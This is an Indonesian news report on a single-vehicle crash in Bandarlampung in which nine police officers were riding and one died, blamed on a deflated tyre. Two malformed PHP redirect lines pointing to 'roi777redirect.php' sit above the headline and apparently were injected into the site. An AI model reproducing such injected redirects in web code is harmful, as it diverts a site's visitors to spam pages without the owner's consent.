header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); Kecelakaan Tunggal, Satu Penumpang Meninggal -
Kecelakaan Tunggal, Satu Penumpang Meninggal

Foto Andi Apriyadi/radarlampung.co.id/tnn

Mitsubishi Strada yang terbalik di Jalan P. Antasari, Minggu (1/7).

TRANSLAMPUNG.COM, BANDARLAMPUNG – Kecelakaan tunggal yang terjadi di Jalan Pangeran Antasari, Sukarame, Bandarlampung Minggu (1/7) pukul 04.30 WIB, ternyata dikabarkan ditumpangi oleh sembilan anggota polisi yang baru pulang berdinas. Dikabarkan berasal dari Satuan Sabhara Polda Lampung.

Dalam kecelakaan tersebut satu orang penumpang meninggal dunia. Kasatlantas Polresta Bandarlampung Kompol Souzarnanda Mega mengatakan, bahwa penumpang kendaraan ada sembilan orang dan merupakan anggota polisi.

“Iya benar, sembilan orang itu anggota Satuan Sabhara Polda Lampung, mereka baru pulang tugas dari penjagaan Operasi Mantab Praja di KPU dan Bawaslu,” tuturnya.

Nanda menuturkan, ternyata dari sembilan penumpang mobil tersebut mengalami luka-luka yang serius dan diantara kesembilan anggota tersebut meninggal dunia.

“Satu diantaranya mengalami luka serius, dan baru saja dinyatakan meninggal dunia,” ucapnya.

Dia menambahkan, untuk penyebab kecelakaan dikarenakan roda sebelah kanan mengalami kempes sehingga membuat mobil terbalik.

“Dari hasil olah TKP, roda sebelah kanan kempes, sehingga saat melaju mobil mengalami oleng ke arah kanan, sehingga menabrak median jalan, kemudian mobil terbalik,” tandasnya.

Berdasarkan informasi yang diterima radarlampung.co.id, satu penumpang kecelakaan yang meninggal dunia atas nama Bripda M. Tio Fahmi anggota Dit Sabhara Polda Lampung.

Sebelumnya diberitakan, satu unit mobil Mitsubishi Strada Triton bernomor polisi BE 9881 WD terbalik di Jalan P Antasari, Kecamatan, Kedamaian, Bandarlampung tepatnya di depan di Kantor Pos Antasari, Minggu, (1/7), sekitar pukul 4.30 WIB. (ndi/gus/tnn)

 

 

 

News Reporter